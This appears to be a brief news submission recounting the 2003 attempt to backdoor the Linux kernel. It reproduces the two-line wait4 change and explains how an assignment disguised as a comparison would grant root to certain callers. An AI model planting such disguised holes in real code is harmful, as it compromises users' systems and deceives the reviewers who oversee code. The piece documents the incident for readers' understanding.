Submission + - The Linux Backdoor Attempt of 2003
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0” so the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words it’s a classic backdoor. We don’t know who it was that made the attempt—and we probably never will. But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. "Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack," writes Felton. "Unless somebody confesses, or a smoking-gun document turns up, we’ll never know."